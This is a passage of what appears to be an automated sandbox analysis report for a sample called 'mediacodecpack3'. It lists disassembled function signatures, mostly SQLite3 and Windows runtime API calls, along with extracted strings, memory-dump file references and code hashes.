                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                            • String ID:
                                                                                            • API String ID: 2903785150-0
                                                                                            • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                            • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 423083942-0
                                                                                            • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                            • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                            • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                            • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                            • String ID:
                                                                                            • API String ID: 3556715608-0
                                                                                            • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                            • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                            • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                            • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1866449048-0
                                                                                            • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                            • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                            • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                            • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                            • API String ID: 2238633743-4044615076
                                                                                            • Opcode ID: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                            • Instruction ID: 36fb3fed3a384cff097ea3fb9e63704b9da04faa094e7ece228342700e77c082
                                                                                            • Opcode Fuzzy Hash: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                            • Instruction Fuzzy Hash: E5018431700211DBC7109FB59FC0A177BE99A997C0712093FB646FA2A3DA7C88158FAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                            • API String ID: 0-780898
                                                                                            • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                            • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                            • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                            • API String ID: 0-2604012851
                                                                                            • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                            • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                            • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408640,00000001,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 00406409
                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,0040863C,00000001,00000000,00000000,?,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406425
                                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405E87,?,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 0040646E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405E87,00200020,00000000,?,00000000,00000000), ref: 004064A6
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004064FE
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 00406514
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00405E87,00000000,00405E87,?,?,00405E87,00200020,00000000,?,00000000), ref: 00406547
                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405E87,00200020,00000000,?,00000000), ref: 004065AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 352835431-0
                                                                                            • Opcode ID: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                            • Instruction ID: d42c4ff00bdcea80f115aa50461d5d245c16a81543514470c81a73783c2cd3a2
                                                                                            • Opcode Fuzzy Hash: 9c7cee020c542fb800dbf7d144ed3697215e486a5166d3a559f4f8a108ac6f85
                                                                                            • Instruction Fuzzy Hash: 4A517B71900209FFCF229F58DD49A9F7BB9FB48750F11413AF912B12A0D7398961DBA8
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                            • String ID: 0$SQLite format 3
                                                                                            • API String ID: 3174206576-3388949527
                                                                                            • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                            • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                            • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                            • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                            • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                              • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                              • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                            • String ID: |
                                                                                            • API String ID: 1576672187-2343686810
                                                                                            • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                            • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                            • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                                            • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                            APIs
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                              • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                            • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                            • API String ID: 652164897-1572359634
                                                                                            • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                            • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                            • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                                            • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
                                                                                            • GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
                                                                                            • WriteFile.KERNEL32(00000000), ref: 00403F17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                            • API String ID: 3784150691-4022980321
                                                                                            • Opcode ID: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                            • Instruction ID: 1325ef8c40c3fac29ee6baa2b36e74f90486e8040fe1898f7fb10d69898ee010
                                                                                            • Opcode Fuzzy Hash: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
                                                                                            • Instruction Fuzzy Hash: 3331C172A002186FDF24EA60DE4AFEA776CAB45304F10057FF584F61D1DAB8AE448A5D
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 2352520524-0
                                                                                            • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                            • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                            • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                                            • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                            • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: optimize
                                                                                            • API String ID: 3659050757-3797040228
                                                                                            • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                            • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                            • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                            APIs
                                                                                            • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                            • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                            • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                            • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
